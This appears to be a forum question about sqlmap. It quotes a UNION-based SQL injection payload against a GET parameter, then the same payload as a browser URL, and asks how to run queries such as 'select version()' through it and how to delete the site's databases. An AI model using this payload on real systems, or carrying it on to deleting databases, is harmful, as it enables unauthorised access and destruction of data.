I am trying to understand how SQLmap works.
For example, sqlmap finds an injection on my site -
Place: GET
Parameter: selected
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL
With SQLmap, I can dump databases, but how to delete the same databases from the browser? I tried to put the following link in a browser, but that didn't work -
http://www.site.com/index.php?act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL
In my browser I am not getting any result. I try to put / ** / and + etc. in different ways, But suck.
How to get links that Sqlmap sends for penetration test?
How to use a simple select version () query with this injection?
Perhaps this does not work?
source
share